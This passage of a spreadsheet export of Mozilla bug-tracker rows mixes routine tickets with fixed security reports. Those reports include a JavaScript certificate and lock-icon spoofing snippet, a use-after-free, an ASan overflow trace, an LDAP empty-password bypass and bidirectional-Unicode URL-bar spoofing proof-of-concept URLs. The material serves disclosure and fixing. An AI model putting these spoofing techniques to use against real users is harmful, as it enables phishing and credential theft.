      <c r="C4188" t="inlineStr">
        <is>
          <t>lock icon and certificates spoofable with "wyciwyg:"</t>
        </is>
      </c>
      <c r="D4188" t="inlineStr">
        <is>
          <t>2011-08-05 21:25:08 -0700</t>
        </is>
      </c>
      <c r="E4188" t="n">
        <v>1</v>
      </c>
      <c r="F4188" t="n">
        <v>1</v>
      </c>
      <c r="G4188" t="n">
        <v>3</v>
      </c>
      <c r="H4188" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4188" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4188" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4188" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4188" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4188" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4188" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4188" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4188" t="inlineStr">
        <is>
          <t>[sg:fix]leave confidential until 278003 fixed</t>
        </is>
      </c>
      <c r="Q4188" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4188" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4188" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4188" t="n">
        <v>1</v>
      </c>
      <c r="U4188" t="n">
        <v>0</v>
      </c>
      <c r="V4188" t="n">
        <v>44</v>
      </c>
      <c r="W4188" t="inlineStr">
        <is>
          <t>(Related to Bug 262689)
See the testcase 2 in Bug 277554.
http://beta51.minutedesign.com/test2.html
Steps to Reproduce:
1. Load test2.html
2. Click the link
3. Notice that the content appears to be secure, 
   and the certificate from https://login.yahoo.com/ is shown
See the source of testcase. 
Content is written by function rewrite().
Succeed:
window.opener.document.open();
window.opener.stop();
window.opener.document.write(spoofing);
Failed:
window.opener.document.open();
window.opener.document.write(spoofing);
window.opener.document.close();
To insure spoofing, you have to use "stop()" instead of "document.close()".</t>
        </is>
      </c>
      <c r="X4188" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4189">
      <c r="A4189" t="n">
        <v>932741</v>
      </c>
      <c r="B4189" t="inlineStr">
        <is>
          <t>2013-10-30 04:43:01 -0700</t>
        </is>
      </c>
      <c r="C4189" t="inlineStr">
        <is>
          <t>Sumomo "service unavailable"</t>
        </is>
      </c>
      <c r="D4189" t="inlineStr">
        <is>
          <t>2019-03-06 09:54:02 -0800</t>
        </is>
      </c>
      <c r="E4189" t="n">
        <v>1</v>
      </c>
      <c r="F4189" t="n">
        <v>1</v>
      </c>
      <c r="G4189" t="n">
        <v>6</v>
      </c>
      <c r="H4189" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4189" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J4189" t="inlineStr">
        <is>
          <t>WebOps: Other</t>
        </is>
      </c>
      <c r="K4189" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4189" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4189" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N4189" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4189" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4189" t="inlineStr"/>
      <c r="Q4189" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4189" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4189" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4189" t="n">
        <v>1</v>
      </c>
      <c r="U4189" t="n">
        <v>0</v>
      </c>
      <c r="V4189" t="n">
        <v>2</v>
      </c>
      <c r="W4189" t="inlineStr">
        <is>
          <t>all of https://support.mozillamessaging.com/ is down</t>
        </is>
      </c>
      <c r="X4189" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4190">
      <c r="A4190" t="n">
        <v>942940</v>
      </c>
      <c r="B4190" t="inlineStr">
        <is>
          <t>2013-11-25 10:35:51 -0800</t>
        </is>
      </c>
      <c r="C4190" t="inlineStr">
        <is>
          <t>Potential dangling peerreflexive candidate on some types of failure.</t>
        </is>
      </c>
      <c r="D4190" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:44 -0800</t>
        </is>
      </c>
      <c r="E4190" t="n">
        <v>1</v>
      </c>
      <c r="F4190" t="n">
        <v>1</v>
      </c>
      <c r="G4190" t="n">
        <v>3</v>
      </c>
      <c r="H4190" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4190" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4190" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K4190" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4190" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4190" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4190" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4190" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4190" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+]</t>
        </is>
      </c>
      <c r="Q4190" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4190" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4190" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T4190" t="n">
        <v>1</v>
      </c>
      <c r="U4190" t="n">
        <v>0</v>
      </c>
      <c r="V4190" t="n">
        <v>34</v>
      </c>
      <c r="W4190" t="inlineStr">
        <is>
          <t>When a new peer reflexive candidate is created, it is inserted into the candidate list prior to creation of the required candidate pair.
http://dxr.mozilla.org/mozilla-central/source/media/mtransport/third_party/nICEr/src/ice/ice_component.c#523
If some failure is encountered while creating the pair, the code at the abort: label destroys the already inserted candidate, leaving us open for use after free, and guaranteeing a double free.
http://dxr.mozilla.org/mozilla-central/source/media/mtransport/third_party/nICEr/src/ice/ice_component.c#587</t>
        </is>
      </c>
      <c r="X4190" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4191">
      <c r="A4191" t="n">
        <v>1258079</v>
      </c>
      <c r="B4191" t="inlineStr">
        <is>
          <t>2016-03-18 21:42:17 -0700</t>
        </is>
      </c>
      <c r="C4191" t="inlineStr">
        <is>
          <t>Intermittent test_mediaDecoding.html | application crashed [@ mozilla::OffTheBooksMutex::Lock]</t>
        </is>
      </c>
      <c r="D4191" t="inlineStr">
        <is>
          <t>2016-09-22 17:25:29 -0700</t>
        </is>
      </c>
      <c r="E4191" t="n">
        <v>1</v>
      </c>
      <c r="F4191" t="n">
        <v>1</v>
      </c>
      <c r="G4191" t="n">
        <v>3</v>
      </c>
      <c r="H4191" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4191" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4191" t="inlineStr">
        <is>
          <t>Audio/Video: MediaStreamGraph</t>
        </is>
      </c>
      <c r="K4191" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4191" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4191" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4191" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4191" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4191" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q4191" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4191" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4191" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T4191" t="n">
        <v>1</v>
      </c>
      <c r="U4191" t="n">
        <v>0</v>
      </c>
      <c r="V4191" t="n">
        <v>21</v>
      </c>
      <c r="W4191" t="inlineStr">
        <is>
          <t>https://treeherder.mozilla.org/logviewer.html#?job_id=24162622&amp;repo=mozilla-inbound</t>
        </is>
      </c>
      <c r="X4191" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4192">
      <c r="A4192" t="n">
        <v>883514</v>
      </c>
      <c r="B4192" t="inlineStr">
        <is>
          <t>2013-06-15 03:04:31 -0700</t>
        </is>
      </c>
      <c r="C4192" t="inlineStr">
        <is>
          <t>Global buffer overflow (read 4) at nsFloatManager::GetFlowArea() with multicol, list, floats</t>
        </is>
      </c>
      <c r="D4192" t="inlineStr">
        <is>
          <t>2024-05-30 08:04:13 -0700</t>
        </is>
      </c>
      <c r="E4192" t="n">
        <v>1</v>
      </c>
      <c r="F4192" t="n">
        <v>1</v>
      </c>
      <c r="G4192" t="n">
        <v>3</v>
      </c>
      <c r="H4192" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4192" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4192" t="inlineStr">
        <is>
          <t>Layout: Floats</t>
        </is>
      </c>
      <c r="K4192" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L4192" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4192" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4192" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4192" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4192" t="inlineStr">
        <is>
          <t>[asan][adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q4192" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4192" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4192" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T4192" t="n">
        <v>1</v>
      </c>
      <c r="U4192" t="n">
        <v>0</v>
      </c>
      <c r="V4192" t="n">
        <v>64</v>
      </c>
      <c r="W4192" t="inlineStr">
        <is>
          <t>Created attachment 763086
original testcase (aborts debug builds when resized or when many copies are loaded)
Opening several of the attached page at once causes ASan to spot a global buffer overflow in current aurora- and beta asan builds, most of the time. The read is aligned and pretty far away from adjecent objects, so filing as a potential security issue since it's not obvious we're always reading something fixed, like padding bytes, with fixed outcome.
The original even larger testcase needed just two of them to trigger this reliably. The attached somewhat reduced page still hits this most of the time. Let me know if you have trouble reproducing, because this could be related to machine speed etc.
$ opt/firefox-aurora-asan/firefox ff-gbof-getflowarea.html{,,,,,,,,,,,,,,} 2&gt;&amp;1 | symbolize | c++filt
=================================================================
==14198== ERROR: AddressSanitizer global-buffer-overflow on address 0x7ff38e6b69a0 at pc 0x7ff386ed8bb1 bp 0x7fff9afa6740 sp 0x7fff9afa6738
READ of size 4 at 0x7ff38e6b69a0 thread T0
    #0 0x7ff386ed8bb0 in nsFloatManager::GetFlowArea(int, nsFloatManager::BandInfoType, int, nsRect, nsFloatManager::SavedState*) const /home/aki/src/mozilla-aurora/layout/generic/nsFloatManager.cpp:140
0x7ff38e6b69a0 is located 32 bytes to the left of global variable 'mozilla::sse_private::sse3_enabled (/home/aki/src/mozilla-aurora/objdir-ff-asan/xpcom/build/SSE.cpp)' (0x7ff38e6b69c0) of size 1
0x7ff38e6b69a0 is located 24 bytes to the right of global variable 'nsTArrayHeader::sEmptyHdr (/home/aki/src/mozilla-aurora/objdir-ff-asan/xpcom/build/nsTArray.cpp)' (0x7ff38e6b6980) of size 8
  'nsTArrayHeader::sEmptyHdr (/home/aki/src/mozilla-aurora/objdir-ff-asan/xpcom/build/nsTArray.cpp)' is ascii string ''
Shadow byte and word:
  0x1ffe71cd6d34: f9
  0x1ffe71cd6d30: 00 f9 f9 f9 f9 f9 f9 f9
More shadow bytes:
  0x1ffe71cd6d10: 04 f9 f9 f9 f9 f9 f9 f9
  0x1ffe71cd6d18: 01 f9 f9 f9 f9 f9 f9 f9
  0x1ffe71cd6d20: 04 f9 f9 f9 f9 f9 f9 f9
  0x1ffe71cd6d28: 00 00 00 f9 f9 f9 f9 f9
=&gt;0x1ffe71cd6d30: 00 f9 f9 f9 f9 f9 f9 f9
  0x1ffe71cd6d38: 01 f9 f9 f9 f9 f9 f9 f9
  0x1ffe71cd6d40: 01 f9 f9 f9 f9 f9 f9 f9
  0x1ffe71cd6d48: 01 f9 f9 f9 f9 f9 f9 f9
  0x1ffe71cd6d50: 01 f9 f9 f9 f9 f9 f9 f9
Stats: 150M malloced (212M for red zones) by 600810 calls
Stats: 12M realloced by 34962 calls
Stats: 102M freed by 265916 calls
Stats: 0M really freed by 0 calls
Stats: 400M (102447 full pages) mmaped in 100 calls
  mmaps   by size class: 8:524256; 9:57337; 10:24570; 11:16376; 12:4096; 13:4096; 14:1280; 15:512; 16:1152; 17:128; 18:32; 19:8; 20:4;
  mallocs by size class: 8:502183; 9:54311; 10:19963; 11:14517; 12:3446; 13:3628; 14:1128; 15:394; 16:1111; 17:100; 18:17; 19:8; 20:4;
  frees   by size class: 8:202047; 9:33734; 10:12283; 11:11046; 12:2220; 13:2726; 14:536; 15:272; 16:944; 17:90; 18:11; 19:4; 20:3;
  rfrees  by size class:
Stats: malloc large: 129 small slow: 2773
==14198== ABORTING</t>
        </is>
      </c>
      <c r="X4192" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4193">
      <c r="A4193" t="n">
        <v>1113301</v>
      </c>
      <c r="B4193" t="inlineStr">
        <is>
          <t>2014-12-18 12:20:10 -0800</t>
        </is>
      </c>
      <c r="C4193" t="inlineStr">
        <is>
          <t>EOY 2014: Copy for Totalizer Description when we reach our 1.75M Goal</t>
        </is>
      </c>
      <c r="D4193" t="inlineStr">
        <is>
          <t>2014-12-22 12:47:13 -0800</t>
        </is>
      </c>
      <c r="E4193" t="n">
        <v>1</v>
      </c>
      <c r="F4193" t="n">
        <v>1</v>
      </c>
      <c r="G4193" t="n">
        <v>5</v>
      </c>
      <c r="H4193" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4193" t="inlineStr">
        <is>
          <t>Mozilla Foundation Communications</t>
        </is>
      </c>
      <c r="J4193" t="inlineStr">
        <is>
          <t>Graphic Design</t>
        </is>
      </c>
      <c r="K4193" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4193" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4193" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4193" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4193" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4193" t="inlineStr">
        <is>
          <t>[studiomofo][EOYFR2014][f.m.o][p1]</t>
        </is>
      </c>
      <c r="Q4193" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4193" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4193" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4193" t="n">
        <v>1</v>
      </c>
      <c r="U4193" t="n">
        <v>0</v>
      </c>
      <c r="V4193" t="n">
        <v>8</v>
      </c>
      <c r="W4193" t="inlineStr">
        <is>
          <t>The description around the totalizer needs to be updated when we hit the 1.75M goal stated.
Sabrina will assist balancing the layout to accomodate new copy.
Andrea will supply messaging and approach. Also - please assign priority whiteboard tag and cc who will be updating this on the totalizer f.m.o. page.</t>
        </is>
      </c>
      <c r="X4193" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4194">
      <c r="A4194" t="n">
        <v>54901</v>
      </c>
      <c r="B4194" t="inlineStr">
        <is>
          <t>2000-10-02 09:22:24 -0700</t>
        </is>
      </c>
      <c r="C4194" t="inlineStr">
        <is>
          <t>[security] LDAP Authentication should fail for empty passwords</t>
        </is>
      </c>
      <c r="D4194" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:23 -0800</t>
        </is>
      </c>
      <c r="E4194" t="n">
        <v>1</v>
      </c>
      <c r="F4194" t="n">
        <v>1</v>
      </c>
      <c r="G4194" t="n">
        <v>4</v>
      </c>
      <c r="H4194" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4194" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4194" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4194" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4194" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4194" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4194" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4194" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4194" t="inlineStr"/>
      <c r="Q4194" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4194" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4194" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4194" t="n">
        <v>1</v>
      </c>
      <c r="U4194" t="n">
        <v>0</v>
      </c>
      <c r="V4194" t="n">
        <v>13</v>
      </c>
      <c r="W4194" t="inlineStr">
        <is>
          <t>When using LDAP and no password is specified in the login screen, the bind
is successful even if the user has a password.  This is because and LDAP bind
with no password (regardless of the bindn value) will be treated as an anonymous
bind.
The Netscape SDK documentation at
&lt;http://docs.iplanet.com/docs/manuals/dirsdk/csdk30/writing.htm&gt;, states
    Note that if you specify a DN but no password, your client will
    bind to the server anonymously. If you want a NULL password to
    be rejected as an incorrect password, you need to write code to
    perform the check before you call the ldap_simple_bind() or
   ldap_simple_bind_s() function.
The following diff shows such a change to CGI.pl:
===================================================================
RCS file: /cvsroot/mozilla/webtools/bugzilla/CGI.pl,v
retrieving revision 1.73
diff -u -r1.73 CGI.pl
--- CGI.pl      2000/09/18 21:29:44     1.73
+++ CGI.pl      2000/10/02 16:18:27
@@ -719,6 +719,21 @@
          exit;
        }
+       # if no password was provided, then fail the authentication
+       # while it may be valid to not have an LDAP password, when you
+       # bind without a password (regardless of the binddn value), you
+       # will get an anonymous bind.  I do not know of a way to determine
+       # whether a bind is anonymous or not without making changes to the
+       # LDAP access control settings
+       if ( ! $::FORM{"LDAP_password"} ) {
+         print "Content-type: text/html\n\n";
+         PutHeader("Login Failed");
+        print "You did not provide a password.\n";
+         print "Please click &lt;b&gt;Back&lt;/b&gt; and try again.\n";
+         PutFooter();
+         exit;
+       }
+
        # We've got our anonymous bind;  let's look up this user.
        my $dnEntry =
$LDAPconn-&gt;search(Param("LDAPBaseDN"),"subtree","uid=".$::FORM{"LDAP_login"});
        if(!$dnEntry) {</t>
        </is>
      </c>
      <c r="X4194" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4195">
      <c r="A4195" t="n">
        <v>1300457</v>
      </c>
      <c r="B4195" t="inlineStr">
        <is>
          <t>2016-09-04 20:16:58 -0700</t>
        </is>
      </c>
      <c r="C4195" t="inlineStr">
        <is>
          <t>Firefox Crash Data stopped updating Aug 31</t>
        </is>
      </c>
      <c r="D4195" t="inlineStr">
        <is>
          <t>2016-09-12 13:09:14 -0700</t>
        </is>
      </c>
      <c r="E4195" t="n">
        <v>1</v>
      </c>
      <c r="F4195" t="n">
        <v>1</v>
      </c>
      <c r="G4195" t="n">
        <v>4</v>
      </c>
      <c r="H4195" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4195" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4195" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K4195" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4195" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4195" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4195" t="inlineStr"/>
      <c r="Q4195" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4195" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4195" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4195" t="n">
        <v>1</v>
      </c>
      <c r="U4195" t="n">
        <v>0</v>
      </c>
      <c r="V4195" t="n">
        <v>9</v>
      </c>
      <c r="W4195" t="inlineStr">
        <is>
          <t>The graphs stop at Aug 31:
https://crash-stats.mozilla.com/home/product/Firefox</t>
        </is>
      </c>
      <c r="X4195" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4196">
      <c r="A4196" t="n">
        <v>953993</v>
      </c>
      <c r="B4196" t="inlineStr">
        <is>
          <t>2013-12-29 21:43:17 -0800</t>
        </is>
      </c>
      <c r="C4196" t="inlineStr">
        <is>
          <t>Fennec leaks profile path to logcat</t>
        </is>
      </c>
      <c r="D4196" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E4196" t="n">
        <v>1</v>
      </c>
      <c r="F4196" t="n">
        <v>1</v>
      </c>
      <c r="G4196" t="n">
        <v>6</v>
      </c>
      <c r="H4196" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4196" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4196" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4196" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4196" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4196" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4196" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4196" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4196" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q4196" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4196" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4196" t="inlineStr">
        <is>
          <t>Firefox 29</t>
        </is>
      </c>
      <c r="T4196" t="n">
        <v>1</v>
      </c>
      <c r="U4196" t="n">
        <v>0</v>
      </c>
      <c r="V4196" t="n">
        <v>7</v>
      </c>
      <c r="W4196" t="inlineStr">
        <is>
          <t>Kinda makes Bug 944373 unnecessary!
                Log.d(LOGTAG, "Found profile dir: " + mProfileDir.getAbsolutePath());
12-29 21:40:07.011 D/GeckoProfile( 5655): Found profile dir: /data/data/org.mozilla.fennec_rnewman/files/mozilla/$hash.default</t>
        </is>
      </c>
      <c r="X4196" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4197">
      <c r="A4197" t="n">
        <v>654860</v>
      </c>
      <c r="B4197" t="inlineStr">
        <is>
          <t>2011-05-04 15:23:53 -0700</t>
        </is>
      </c>
      <c r="C4197" t="inlineStr">
        <is>
          <t>unthrottle MU from 3.5.19/3.6.17 -&gt; 4.0.1</t>
        </is>
      </c>
      <c r="D4197" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4197" t="n">
        <v>1</v>
      </c>
      <c r="F4197" t="n">
        <v>1</v>
      </c>
      <c r="G4197" t="n">
        <v>5</v>
      </c>
      <c r="H4197" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4197" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4197" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4197" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4197" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4197" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4197" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4197" t="inlineStr"/>
      <c r="Q4197" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4197" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4197" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4197" t="n">
        <v>1</v>
      </c>
      <c r="U4197" t="n">
        <v>0</v>
      </c>
      <c r="V4197" t="n">
        <v>7</v>
      </c>
      <c r="W4197" t="inlineStr">
        <is>
          <t>(Couldnt find bug for this - even though we've talked about this for weeks - so filing. please DUP-me if one exists.)
Plan is to do prompt MU from:
* FF3.5.19 --&gt; FF4.0.1
* FF3.6.17 --&gt; FF4.0.1
Current schedule is to do this tomorrow (thurs, 05may)</t>
        </is>
      </c>
      <c r="X4197" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4198">
      <c r="A4198" t="n">
        <v>1690979</v>
      </c>
      <c r="B4198" t="inlineStr">
        <is>
          <t>2021-02-05 00:04:52 -0800</t>
        </is>
      </c>
      <c r="C4198" t="inlineStr">
        <is>
          <t>URL bar spoofing with bidirectional Unicode characters (also link hover text)</t>
        </is>
      </c>
      <c r="D4198" t="inlineStr">
        <is>
          <t>2024-05-30 10:26:57 -0700</t>
        </is>
      </c>
      <c r="E4198" t="n">
        <v>1</v>
      </c>
      <c r="F4198" t="n">
        <v>1</v>
      </c>
      <c r="G4198" t="n">
        <v>2</v>
      </c>
      <c r="H4198" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4198" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4198" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4198" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4198" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4198" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4198" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][snt-scrubbed][adv-ESR115.4+]</t>
        </is>
      </c>
      <c r="Q4198" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4198" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4198" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T4198" t="n">
        <v>1</v>
      </c>
      <c r="U4198" t="n">
        <v>0</v>
      </c>
      <c r="V4198" t="n">
        <v>18</v>
      </c>
      <c r="W4198" t="inlineStr">
        <is>
          <t>The URL bar content can be spoofed by mixing bidirectional Unicode characters in specific ways, allowing an attacker to forge the displayed protocol and host.
I'm reporting two variants. (1) is Firefox-specific and seems to be facilitated by URL trimming. (2) affects both Firefox and Google Chrome and seems to point to a general issue with how the parts of bidirectional URLs are reordered.
**(1)**
In a text, the first occurring *strong* (i.e. directional) character determines the base direction. In the URL bar, this is usually the `h` of `http`. However, Firefox strips `http://` from plain HTTP URLs (if `browser.urlbar.trimURLs == true`, as is the default). In that case, the first character of the hostname determines the text direction. So, if a hostname from an RTL script is chosen (which passes the IDN display algorithm without being altered, e.g. an Arabic or Hebrew word), the entire URL string is displayed with RTL as the base direction. This arranges parts of the URL in unexpected ways.
**Proof of concept**
- [`http://xn--tib.ml/index%F0%90%A9%96https://www.mozilla.org/articles`](http://xn--tib.ml/index%F0%90%A9%96https://www.mozilla.org/articles) appears in the URL bar as `https://www.mozilla.org/articles𐩖ml/index.ٴ`, spoofing both the HTTPS protocol and full host. (I've chosen an Arabic letter as the second-level domain name and an RTL slash-lookalike (`U+10A56`) as a convincing path separator, although the latter isn't a requirement for the attack.)
- Similarly, a hostname with European numbers (because they aren't *strongly* directional) and an RTL top-level domain could be used, e.g.: [`http://123.456.קום/https://www.mozilla.org/articles`](http://123.456.קום/https://www.mozilla.org/articles) which displays as `https://www.mozilla.org/articles/קום.123.456`
**(2)**
